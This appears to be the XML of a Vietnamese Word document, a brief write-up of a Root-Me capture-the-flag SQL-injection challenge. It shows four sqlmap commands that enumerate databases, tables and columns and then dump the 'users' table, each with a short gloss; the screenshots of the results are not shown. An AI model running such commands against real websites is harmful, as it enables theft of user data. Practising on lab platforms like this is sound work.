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EFB7" w14:textId="0AFD5413" w:rsidR="00B26BF7" w:rsidRDefault="00136D8C">
      <w:r w:rsidRPr="00136D8C">
        <w:t xml:space="preserve">sqlmap -u "http://challenge01.root-me.org/web-serveur/ch18/?action=news&amp;news_id=2" --batch </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00136D8C">
        <w:t>dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDE9825" w14:textId="64A438C2" w:rsidR="00136D8C" w:rsidRDefault="00136D8C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dbs là option để liệt kê các cơ sở dữ liệu của website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1545AA74" w14:textId="2BB8F270" w:rsidR="00136D8C" w:rsidRDefault="00136D8C">
      <w:r w:rsidRPr="00136D8C"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9D77319" wp14:editId="15D63E5C">
            <wp:simplePos x="914400" y="1553951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147445"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="125765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5312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D8C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7541481C" wp14:editId="625ADC5A">
            <wp:extent cx="5943600" cy="1284605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="57744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3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B864" w14:textId="77777777" w:rsidR="00136D8C" w:rsidRDefault="00136D8C"/>
    <w:p w14:paraId="74A5F9FF" w14:textId="77777777" w:rsidR="00136D8C" w:rsidRDefault="00136D8C"/>
    <w:p w14:paraId="7A4227AF" w14:textId="77777777" w:rsidR="00136D8C" w:rsidRDefault="00136D8C"/>
    <w:p w14:paraId="36AAAE7D" w14:textId="77777777" w:rsidR="00136D8C" w:rsidRDefault="00136D8C"/>
    <w:p w14:paraId="68B2AC4A" w14:textId="77777777" w:rsidR="00136D8C" w:rsidRDefault="00136D8C"/>
    <w:p w14:paraId="6F8DF236" w14:textId="4E8BCB6F" w:rsidR="00136D8C" w:rsidRDefault="00136D8C">
      <w:r w:rsidRPr="00136D8C">
        <w:t xml:space="preserve">sqlmap -u "http://challenge01.root-me.org/web-serveur/ch18/?action=news&amp;news_id=2" --batch </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00136D8C">
        <w:t>tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B147F9" w14:textId="7AFD9D05" w:rsidR="00136D8C" w:rsidRDefault="00136D8C">
      <w:r>
        <w:t>liệt kê các bảng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E9D7CC" w14:textId="2091BF24" w:rsidR="00136D8C" w:rsidRDefault="00136D8C">
      <w:r w:rsidRPr="00136D8C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="125E85E6" wp14:editId="3EA1688D">
            <wp:extent cx="5943600" cy="2392045"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="29329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0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2EC3" w14:textId="24A16A2A" w:rsidR="00136D8C" w:rsidRDefault="00136D8C">
      <w:r w:rsidRPr="00136D8C">
        <w:lastRenderedPageBreak/>
        <w:t>sqlmap -u "http://challenge01.root-me.org/web-serveur/ch18/?action=news&amp;news_id=2" --batch --columns -D users -T users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C74C30" w14:textId="5975FC23" w:rsidR="00136D8C" w:rsidRDefault="00136D8C">
      <w:r>
        <w:t>li</w:t>
      </w:r>
      <w:r w:rsidR="00105E16">
        <w:t>ệt kê các cột trong bảng user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48458C82" w14:textId="19CC0495" w:rsidR="00136D8C" w:rsidRDefault="00136D8C">
      <w:r w:rsidRPr="00136D8C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20D0F973" wp14:editId="1EDAE23D">
            <wp:extent cx="5943600" cy="2379980"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="3404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5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5F9C" w14:textId="77777777" w:rsidR="00105E16" w:rsidRDefault="00105E16"/>
    <w:p w14:paraId="73B1F9F3" w14:textId="77777777" w:rsidR="00105E16" w:rsidRDefault="00105E16"/>
    <w:p w14:paraId="51A8A2BA" w14:textId="77777777" w:rsidR="00105E16" w:rsidRDefault="00105E16"/>
    <w:p w14:paraId="005349D4" w14:textId="77777777" w:rsidR="00105E16" w:rsidRDefault="00105E16"/>
    <w:p w14:paraId="502EEAA5" w14:textId="55E6FEDB" w:rsidR="00136D8C" w:rsidRDefault="00136D8C">
      <w:r w:rsidRPr="00136D8C">
        <w:t>sqlmap -u "http://challenge01.root-me.org/web-serveur/ch18/?action=news&amp;news_id=2" --batch --dump -D users -T users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488EC5E3" w14:textId="57AEFF77" w:rsidR="00105E16" w:rsidRDefault="00105E16">
      <w:r>
        <w:t>lấy dữ liệu của bảng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9C7B6C" w14:textId="1011C603" w:rsidR="00136D8C" w:rsidRDefault="00136D8C">
      <w:r w:rsidRPr="00136D8C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14E62CFF" wp14:editId="6027396D">
            <wp:extent cx="5943600" cy="2306320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20527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8C"/>
    <w:rsid w:val="00105E16"/>
    <w:rsid w:val="00136D8C"/>
    <w:rsid w:val="00B26BF7"/>
    <w:rsid w:val="00C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9B40"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EEC2C86D-C08A-488D-AFEF-A559DAB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1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-06-30T15:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-30T15:34:00Z</dcterms:modified>
</cp:coreProperties>
</file>